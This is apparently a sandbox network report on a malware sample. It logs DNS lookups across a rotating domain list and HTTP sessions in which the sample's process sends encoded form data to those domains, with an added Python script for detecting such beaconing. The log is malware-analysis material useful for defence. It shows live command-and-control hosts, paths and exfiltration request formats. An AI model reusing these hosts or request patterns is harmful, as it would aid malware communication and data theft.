                                                            Nov 24, 2024 08:15:21.302289009 CET8049997104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:22.273236036 CET8049997104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:22.274786949 CET8049997104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:22.274971962 CET4999780192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:22.683396101 CET4999780192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:23.703007936 CET4999880192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:23.823080063 CET8049998104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:23.823331118 CET4999880192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:23.833026886 CET4999880192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:23.952532053 CET8049998104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:24.989691973 CET8049998104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:24.991065025 CET8049998104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:24.991139889 CET4999880192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:24.994297981 CET4999880192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:25.114098072 CET8049998104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:30.427088022 CET4999980192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:30.546901941 CET804999913.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:30.547035933 CET4999980192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:30.564306021 CET4999980192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:30.684062004 CET804999913.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:31.696038961 CET804999913.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:31.696105957 CET4999980192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:32.074038982 CET4999980192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:32.193727016 CET804999913.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:33.093221903 CET5000080192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:33.212821960 CET805000013.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:33.213071108 CET5000080192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:33.228332043 CET5000080192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:33.348062992 CET805000013.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:34.359693050 CET805000013.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:34.359908104 CET5000080192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:34.730261087 CET5000080192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:34.849837065 CET805000013.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:35.749305010 CET5000180192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:35.868877888 CET805000113.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:35.868974924 CET5000180192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:35.885054111 CET5000180192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:36.004672050 CET805000113.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:36.004761934 CET805000113.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:37.016793966 CET805000113.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:37.016874075 CET5000180192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:37.388024092 CET5000180192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:37.507622957 CET805000113.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:38.405735016 CET5000280192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:38.525882006 CET805000213.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:38.526264906 CET5000280192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:38.535698891 CET5000280192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:38.655477047 CET805000213.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:39.670455933 CET805000213.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:39.670525074 CET805000213.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:39.670778990 CET5000280192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:39.673729897 CET5000280192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:39.793211937 CET805000213.248.169.48192.168.2.10
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Nov 24, 2024 08:13:43.383071899 CET  64784        53         192.168.2.10   1.1.1.1
Nov 24, 2024 08:13:44.370724916 CET  64784        53         192.168.2.10   1.1.1.1
Nov 24, 2024 08:13:45.386568069 CET  64784        53         192.168.2.10   1.1.1.1
Nov 24, 2024 08:13:45.832931995 CET  53           64784      1.1.1.1        192.168.2.10
Nov 24, 2024 08:13:45.832947969 CET  53           64784      1.1.1.1        192.168.2.10
Nov 24, 2024 08:13:45.832962990 CET  53           64784      1.1.1.1        192.168.2.10
Nov 24, 2024 08:13:58.577953100 CET  63868        53         192.168.2.10   1.1.1.1
Nov 24, 2024 08:13:59.573956966 CET  63868        53         192.168.2.10   1.1.1.1
Nov 24, 2024 08:13:59.643435955 CET  53           63868      1.1.1.1        192.168.2.10
Nov 24, 2024 08:13:59.710750103 CET  53           63868      1.1.1.1        192.168.2.10
Nov 24, 2024 08:14:14.984188080 CET  49790        53         192.168.2.10   1.1.1.1
Nov 24, 2024 08:14:15.379817009 CET  53           49790      1.1.1.1        192.168.2.10
Nov 24, 2024 08:14:29.702469110 CET  58464        53         192.168.2.10   1.1.1.1
Nov 24, 2024 08:14:30.159219980 CET  53           58464      1.1.1.1        192.168.2.10
Nov 24, 2024 08:14:44.468935013 CET  55133        53         192.168.2.10   1.1.1.1
Nov 24, 2024 08:14:45.480329990 CET  55133        53         192.168.2.10   1.1.1.1
Nov 24, 2024 08:14:45.779037952 CET  53           55133      1.1.1.1        192.168.2.10
Nov 24, 2024 08:14:45.779068947 CET  53           55133      1.1.1.1        192.168.2.10
Nov 24, 2024 08:15:00.234694958 CET  54936        53         192.168.2.10   1.1.1.1
Nov 24, 2024 08:15:00.920823097 CET  53           54936      1.1.1.1        192.168.2.10
Nov 24, 2024 08:15:15.282846928 CET  62257        53         192.168.2.10   1.1.1.1
Nov 24, 2024 08:15:15.709661961 CET  53           62257      1.1.1.1        192.168.2.10
Nov 24, 2024 08:15:30.000231981 CET  49317        53         192.168.2.10   1.1.1.1
Nov 24, 2024 08:15:30.424288988 CET  53           49317      1.1.1.1        192.168.2.10
Nov 24, 2024 08:15:45.187280893 CET  51320        53         192.168.2.10   1.1.1.1
Nov 24, 2024 08:15:46.183418036 CET  51320        53         192.168.2.10   1.1.1.1
Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name                       Type            Class        DNS over HTTPS
Nov 24, 2024 08:13:43.383071899 CET  192.168.2.10  1.1.1.1  0xf349    Standard query (0)  www.funnystory.online      A (IP address)  IN (0x0001)  false
Nov 24, 2024 08:13:44.370724916 CET  192.168.2.10  1.1.1.1  0xf349    Standard query (0)  www.funnystory.online      A (IP address)  IN (0x0001)  false
Nov 24, 2024 08:13:45.386568069 CET  192.168.2.10  1.1.1.1  0xf349    Standard query (0)  www.funnystory.online      A (IP address)  IN (0x0001)  false
Nov 24, 2024 08:13:58.577953100 CET  192.168.2.10  1.1.1.1  0x31e1    Standard query (0)  www.nartex-uf.online       A (IP address)  IN (0x0001)  false
Nov 24, 2024 08:13:59.573956966 CET  192.168.2.10  1.1.1.1  0x31e1    Standard query (0)  www.nartex-uf.online       A (IP address)  IN (0x0001)  false
Nov 24, 2024 08:14:14.984188080 CET  192.168.2.10  1.1.1.1  0x2bc2    Standard query (0)  www.aktmarket.xyz          A (IP address)  IN (0x0001)  false
Nov 24, 2024 08:14:29.702469110 CET  192.168.2.10  1.1.1.1  0x18ef    Standard query (0)  www.a1shop.shop            A (IP address)  IN (0x0001)  false
Nov 24, 2024 08:14:44.468935013 CET  192.168.2.10  1.1.1.1  0x9831    Standard query (0)  www.cssa.auction           A (IP address)  IN (0x0001)  false
Nov 24, 2024 08:14:45.480329990 CET  192.168.2.10  1.1.1.1  0x9831    Standard query (0)  www.cssa.auction           A (IP address)  IN (0x0001)  false
Nov 24, 2024 08:15:00.234694958 CET  192.168.2.10  1.1.1.1  0xdced    Standard query (0)  www.urbanxplore.info       A (IP address)  IN (0x0001)  false
Nov 24, 2024 08:15:15.282846928 CET  192.168.2.10  1.1.1.1  0x982d    Standard query (0)  www.3kw40881107247y.click  A (IP address)  IN (0x0001)  false
Nov 24, 2024 08:15:30.000231981 CET  192.168.2.10  1.1.1.1  0x3712    Standard query (0)  www.heliopsis.xyz          A (IP address)  IN (0x0001)  false
Nov 24, 2024 08:15:45.187280893 CET  192.168.2.10  1.1.1.1  0xc9b5    Standard query (0)  www.mdpc7.top              A (IP address)  IN (0x0001)  false
Nov 24, 2024 08:15:46.183418036 CET  192.168.2.10  1.1.1.1  0xc9b5    Standard query (0)  www.mdpc7.top              A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name                       CName              Address         Type                    Class        DNS over HTTPS
Nov 24, 2024 08:13:45.832931995 CET  1.1.1.1    192.168.2.10  0xf349    No error (0)  www.funnystory.online      funnystory.online  -               CNAME (Canonical name)  IN (0x0001)  false
Nov 24, 2024 08:13:45.832931995 CET  1.1.1.1    192.168.2.10  0xf349    No error (0)  funnystory.online          -                  172.104.82.74   A (IP address)          IN (0x0001)  false
Nov 24, 2024 08:13:45.832947969 CET  1.1.1.1    192.168.2.10  0xf349    No error (0)  www.funnystory.online      funnystory.online  -               CNAME (Canonical name)  IN (0x0001)  false
Nov 24, 2024 08:13:45.832947969 CET  1.1.1.1    192.168.2.10  0xf349    No error (0)  funnystory.online          -                  172.104.82.74   A (IP address)          IN (0x0001)  false
Nov 24, 2024 08:13:45.832962990 CET  1.1.1.1    192.168.2.10  0xf349    No error (0)  www.funnystory.online      funnystory.online  -               CNAME (Canonical name)  IN (0x0001)  false
Nov 24, 2024 08:13:45.832962990 CET  1.1.1.1    192.168.2.10  0xf349    No error (0)  funnystory.online          -                  172.104.82.74   A (IP address)          IN (0x0001)  false
Nov 24, 2024 08:13:59.643435955 CET  1.1.1.1    192.168.2.10  0x31e1    No error (0)  www.nartex-uf.online       -                  31.31.196.177   A (IP address)          IN (0x0001)  false
Nov 24, 2024 08:13:59.710750103 CET  1.1.1.1    192.168.2.10  0x31e1    No error (0)  www.nartex-uf.online       -                  31.31.196.177   A (IP address)          IN (0x0001)  false
Nov 24, 2024 08:14:15.379817009 CET  1.1.1.1    192.168.2.10  0x2bc2    No error (0)  www.aktmarket.xyz          -                  13.248.169.48   A (IP address)          IN (0x0001)  false
Nov 24, 2024 08:14:15.379817009 CET  1.1.1.1    192.168.2.10  0x2bc2    No error (0)  www.aktmarket.xyz          -                  76.223.54.146   A (IP address)          IN (0x0001)  false
Nov 24, 2024 08:14:30.159219980 CET  1.1.1.1    192.168.2.10  0x18ef    No error (0)  www.a1shop.shop            -                  13.248.169.48   A (IP address)          IN (0x0001)  false
Nov 24, 2024 08:14:30.159219980 CET  1.1.1.1    192.168.2.10  0x18ef    No error (0)  www.a1shop.shop            -                  76.223.54.146   A (IP address)          IN (0x0001)  false
Nov 24, 2024 08:14:45.779037952 CET  1.1.1.1    192.168.2.10  0x9831    No error (0)  www.cssa.auction           cssa.auction       -               CNAME (Canonical name)  IN (0x0001)  false
Nov 24, 2024 08:14:45.779037952 CET  1.1.1.1    192.168.2.10  0x9831    No error (0)  cssa.auction               -                  107.167.84.42   A (IP address)          IN (0x0001)  false
Nov 24, 2024 08:14:45.779068947 CET  1.1.1.1    192.168.2.10  0x9831    No error (0)  www.cssa.auction           cssa.auction       -               CNAME (Canonical name)  IN (0x0001)  false
Nov 24, 2024 08:14:45.779068947 CET  1.1.1.1    192.168.2.10  0x9831    No error (0)  cssa.auction               -                  107.167.84.42   A (IP address)          IN (0x0001)  false
Nov 24, 2024 08:15:00.920823097 CET  1.1.1.1    192.168.2.10  0xdced    No error (0)  www.urbanxplore.info       -                  209.74.77.108   A (IP address)          IN (0x0001)  false
Nov 24, 2024 08:15:15.709661961 CET  1.1.1.1    192.168.2.10  0x982d    No error (0)  www.3kw40881107247y.click  -                  104.21.44.16    A (IP address)          IN (0x0001)  false
Nov 24, 2024 08:15:15.709661961 CET  1.1.1.1    192.168.2.10  0x982d    No error (0)  www.3kw40881107247y.click  -                  172.67.192.207  A (IP address)          IN (0x0001)  false
Nov 24, 2024 08:15:30.424288988 CET  1.1.1.1    192.168.2.10  0x3712    No error (0)  www.heliopsis.xyz          -                  13.248.169.48   A (IP address)          IN (0x0001)  false
Nov 24, 2024 08:15:30.424288988 CET  1.1.1.1    192.168.2.10  0x3712    No error (0)  www.heliopsis.xyz          -                  76.223.54.146   A (IP address)          IN (0x0001)  false
                                                            • www.funnystory.online
                                                            • www.nartex-uf.online
                                                            • www.aktmarket.xyz
                                                            • www.a1shop.shop
                                                            • www.cssa.auction
                                                            • www.urbanxplore.info
                                                            • www.3kw40881107247y.click
                                                            • www.heliopsis.xyz
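The query and answer tables above show the sample working through its domain list one name at a time: a name is retried with the same transaction ID when no answer arrives in time, the first query for each successive name lands at a fairly regular spacing, and several names resolve to the same address pair. The script below is an added example for this report, not code from Joe Sandbox or from the sample: it turns the two tables into three checks a detection engineer would run over any resolver log (retransmission count per name, regularity of the first-contact cadence across distinct names, and names that share resolved addresses). The input rows are copied from the tables above; the thresholds of five distinct names and a 20% spread around the median interval are assumptions chosen for this example, as are the function names.

```python
import re
import statistics
from datetime import datetime, timedelta

# DNS queries copied from the report above: (timestamp, transaction ID, queried name).
# Rows repeating the same transaction ID are retransmissions of one query.
DNS_QUERIES = [
    ("Nov 24, 2024 08:13:43.383071899 CET", "0xf349", "www.funnystory.online"),
    ("Nov 24, 2024 08:13:44.370724916 CET", "0xf349", "www.funnystory.online"),
    ("Nov 24, 2024 08:13:45.386568069 CET", "0xf349", "www.funnystory.online"),
    ("Nov 24, 2024 08:13:58.577953100 CET", "0x31e1", "www.nartex-uf.online"),
    ("Nov 24, 2024 08:13:59.573956966 CET", "0x31e1", "www.nartex-uf.online"),
    ("Nov 24, 2024 08:14:14.984188080 CET", "0x2bc2", "www.aktmarket.xyz"),
    ("Nov 24, 2024 08:14:29.702469110 CET", "0x18ef", "www.a1shop.shop"),
    ("Nov 24, 2024 08:14:44.468935013 CET", "0x9831", "www.cssa.auction"),
    ("Nov 24, 2024 08:14:45.480329990 CET", "0x9831", "www.cssa.auction"),
    ("Nov 24, 2024 08:15:00.234694958 CET", "0xdced", "www.urbanxplore.info"),
    ("Nov 24, 2024 08:15:15.282846928 CET", "0x982d", "www.3kw40881107247y.click"),
    ("Nov 24, 2024 08:15:30.000231981 CET", "0x3712", "www.heliopsis.xyz"),
    ("Nov 24, 2024 08:15:45.187280893 CET", "0xc9b5", "www.mdpc7.top"),
    ("Nov 24, 2024 08:15:46.183418036 CET", "0xc9b5", "www.mdpc7.top"),
]

# A-record answers copied from the report above: (queried name, resolved address).
DNS_ANSWERS = [
    ("www.funnystory.online", "172.104.82.74"),
    ("www.nartex-uf.online", "31.31.196.177"),
    ("www.aktmarket.xyz", "13.248.169.48"), ("www.aktmarket.xyz", "76.223.54.146"),
    ("www.a1shop.shop", "13.248.169.48"), ("www.a1shop.shop", "76.223.54.146"),
    ("www.cssa.auction", "107.167.84.42"),
    ("www.urbanxplore.info", "209.74.77.108"),
    ("www.3kw40881107247y.click", "104.21.44.16"), ("www.3kw40881107247y.click", "172.67.192.207"),
    ("www.heliopsis.xyz", "13.248.169.48"), ("www.heliopsis.xyz", "76.223.54.146"),
]

# Joe Sandbox timestamps carry nanoseconds; datetime only holds microseconds, so the
# fractional part is truncated to six digits after parsing the whole-second prefix.
TS_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d+) CET$")


def parse_ts(text):
    m = TS_RE.match(text)
    if not m:
        raise ValueError("unrecognised timestamp: " + text)
    base = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
    return base + timedelta(microseconds=int(m.group(2)[:6].ljust(6, "0")))


def retransmissions(records):
    """How many times each name was asked for; more than once means the first attempt got no timely answer."""
    counts = {}
    for _, txid, name in records:
        counts[(txid, name)] = counts.get((txid, name), 0) + 1
    return {name: n for (_, name), n in counts.items()}


def first_queries(records):
    """First query time per distinct name, in the order the names were first seen."""
    first = {}
    for ts_text, _, name in records:
        if name not in first:
            first[name] = parse_ts(ts_text)
    return first


def detect_rotation(records, min_names=5, tolerance=0.2):
    """Flag a host that contacts a sequence of distinct names at a near-constant interval.

    Returns the distinct-name count, the gaps between successive first contacts, their
    median, and whether every gap lies within +/- tolerance of that median. The limits
    are assumptions for this example; tune them against your own baseline."""
    times = list(first_queries(records).values())
    intervals = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if len(times) < min_names:
        return {"names": len(times), "intervals": intervals, "period": None, "flagged": False}
    period = statistics.median(intervals)
    regular = all(abs(gap - period) <= tolerance * period for gap in intervals)
    return {"names": len(times), "intervals": intervals, "period": period, "flagged": regular}


def shared_addresses(answers, min_names=2):
    """Addresses that more than one queried name resolves to.

    A shared address may be the operator's host or a shared hosting/parking endpoint,
    so it needs a second look before it goes on a block list."""
    names_by_addr = {}
    for name, addr in answers:
        names_by_addr.setdefault(addr, set()).add(name)
    return {addr: names for addr, names in names_by_addr.items() if len(names) >= min_names}
```

On this capture the distinct-name cadence comes out at roughly 15 seconds with every gap inside the 20% band, www.funnystory.online and www.mdpc7.top needed retries, and three of the names land on the same two addresses; the same functions run unchanged over a resolver log exported as (timestamp, transaction ID, name) tuples.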
Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.10  49853        172.104.82.74   80                6048  C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 08:13:45.982008934 CET  405                OUT        GET /2dyu/?9HaD=bADo+7fqvlD2EEl6eQvhi6r6MxrwZqr7unPyaN6ymuSYop7wnq2+HbU7S+lsr3BB8s+/OWm3f+6bBn12YfZxgjGy6pWaqu2XlCfxhX0HPUcroLTQDQ==&wdv4=1RD4 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.funnystory.online
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
Nov 24, 2024 08:13:48.541435957 CET  519                IN         HTTP/1.1 301 Moved Permanently
                                                            Date: Sun, 24 Nov 2024 07:13:47 GMT
                                                            Server: Apache
                                                            X-Powered-By: PHP/8.2.25
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            X-Redirect-By: WordPress
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Location: http://funnystory.online/2dyu/?9HaD=bADo+7fqvlD2EEl6eQvhi6r6MxrwZqr7unPyaN6ymuSYop7wnq2+HbU7S+lsr3BB8s+/OWm3f+6bBn12YfZxgjGy6pWaqu2XlCfxhX0HPUcroLTQDQ==&wdv4=1RD4
                                                            Transfer-Encoding: chunked
                                                            Content-Type: text/html; charset=UTF-8
Nov 24, 2024 08:13:48.549774885 CET  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.10  49884        31.31.196.177   80                6048  C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 08:13:59.781732082 CET  675                OUT        POST /9ul0/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.nartex-uf.online
                                                            Origin: http://www.nartex-uf.online
                                                            Referer: http://www.nartex-uf.online/9ul0/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 193
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Ascii: 9HaD=y+M8hlRgYnlcy6OcjjThNFfSLj/ypQ33RzheOBEewaraACdAU1RBeVIkVZjesO527hkNrwjzelhrnu08gCkNcycEKSGf1LD/A5UCZXkG1SoJMS3aWEOGskxovaVqYDt3WBDwkeLH5lC0C1kfgA3Cw+OPrGGEpTOtuLoSmphqR0Jdk2npoqXY9RdlaL1i
                                                            Nov 24, 2024 08:14:01.222702980 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Sun, 24 Nov 2024 07:14:00 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.10 | 49890 | 31.31.196.177 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:14:02.448090076 CET | 699 | OUT | POST /9ul0/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.nartex-uf.online
                                                            Origin: http://www.nartex-uf.online
                                                            Referer: http://www.nartex-uf.online/9ul0/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 217
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Ascii: 9HaD=y+M8hlRgYnlcgLecvgrhFFfVOj/ygw37RzdeODoOxoPaAitAbURBS1Ike5i1xe5h7h5wrxPzehJrnvE8jzl/cicCHyGdo7D/A5UCZXBj1TAJMCnaWh6Hy0xr/KVqcDtzWBDCkfX+5nK0C0UfgR3BpuOF0WHzkwLx0eUZmLxeRnlCjXau572PumBrUNAItOkgH/wq9uJdVeX0JrG1ng==
                                                            Nov 24, 2024 08:14:03.838325024 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Sun, 24 Nov 2024 07:14:03 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.10 | 49897 | 31.31.196.177 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:14:05.118554115 CET | 1712 | OUT | POST /9ul0/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.nartex-uf.online
                                                            Origin: http://www.nartex-uf.online
                                                            Referer: http://www.nartex-uf.online/9ul0/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1229
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Ascii: 9HaD=y+M8hlRgYnlcgLecvgrhFFfVOj/ygw37RzdeODoOxoHaATNAUX5BcVIkTZi2xe5g7hw3rwzJejBrmNM8ohN/SicCOSGe1LDqA5EGZXRj1TAJMELaU0OHw0xovaVmYDtLWBbSkfTu53q0CUEfz3jBhuOL1WHrk3DY0a9gmJRgRndChwGtloCqwQBoe9lsp4czAex/0fZ1HaTqDpPGlHD6UPIS0ImfbE2ge+MmMOeUq2aDSGiCcvYoxIx5Egq2xIMN36kaPQ6FLZmegKtbxEPwMEPG+UlOaPR240jeGs/me6AAavM+jIOTzRPoKb7G1/4Rd0KaL20Arfr0wk5DaxBUOI//kCKA8uzDH9AvnCHA6ANTGYxb9yugeAhKqgIfadXRFRmEa0rqy8sAnyXtFlriXA9L9fqRDERcQ0m1WurOL7kLUYXedQmA+B8vCFdJ2a6gVvsssTP4exVpHe+MBMZQNBlHupavRH2XaxfRvqJNTjfZhkeIMuKhlhkRhwQaxvL6/5hxKufubIgbftS9iXoSSPYb5CV3nrB151B4tZ4tJLNVEC0wsvLK7A60/ix8fcaDhxEViUcN0ZxVdJZrvOJrpPCa7MskK1Cpk2LWpkvlSoVb/oaw3ds5txyTL2C+yCptnBh1pLvFK68hhU5sZJkghTHOho7+xBWRE2zefJzN+tQ4V9JckFNNasSXmc2k2hTLHxlBp6TQsy+gl3cyvhbbVMcseR0S/lccYLCujgMuisVQgTTIw23dcUSUz1eQ6KJ4OAMXEnGd8rKb0NfA9TdvuomyIJ58QQyebgMt8iTg1tcIvQRKbcWL4lkXa3QQTISgn/pIck72HR4SQH/pBh4N5bRPeJEUm7XqHl4OvjkLjwTbvN2nptBb6STu4BuxnlJvJmIBXM7DHDCLlEIjHcnmDCLcTNgSKE64fKUuyItV0Hy5o/bIumjEbFtQp6t5TxPsQ03KdIAIInftFKzwVOyGqOQkVk5yJQx0xW8ZcNLgZINgQsS [TRUNCATED]
                                                            Nov 24, 2024 08:14:06.686919928 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Sun, 24 Nov 2024 07:14:06 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            4 | 192.168.2.10 | 49904 | 31.31.196.177 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:14:07.769908905 CET | 404 | OUT | GET /9ul0/?9HaD=/8kciQFlGVV+s671hjTEMgvePijKoQKbVww8Emk+/ImbSDpFBlkIfEUbLp7Rr+tD2T8CwWTvaBp6p+1LgixmeT5OVDDglLmzebYBZGko1gl0UlPxFA==&wdv4=1RD4 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.nartex-uf.online
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Nov 24, 2024 08:14:09.109932899 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Sun, 24 Nov 2024 07:14:08 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Data Ascii: feb1<!doctype html><html lang="ru" class="is_adaptive" data-panel-url="https://server194.hosting.reg.ru/manager"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title> &nbsp;</title><style media="all">/*!*************************************************************************************************************************************************************************************************!*\ !*** css ./node_modules/css-loader/index.js??clonedRuleSet-6.use[1]!./node_modules/postcss-loader/src/index.js!./node_modules/less-loader/dist/cjs.js!./bem/blocks.adaptive/b-page/b-page.less ***! \*************************************************************************************************************************************************************************************************/.b-page{display:flex;flex-direction:column;width:100%;min-width:320px;height:100%;padding:57p [TRUNCATED]
                                                            Nov 24, 2024 08:14:09.109970093 CET | 1236 | IN | Data Raw: 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 2d 77 65 62 6b 69
                                                            Data Ascii: px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;background:#fff;-webkit-tap-highlight-color:transparent}html:not(.is_adaptive) .b-page{overflow-x:hidden}@media (min-width:1024px){.is_adaptive .b-page{overflow-x:hidden}}.b-page_type
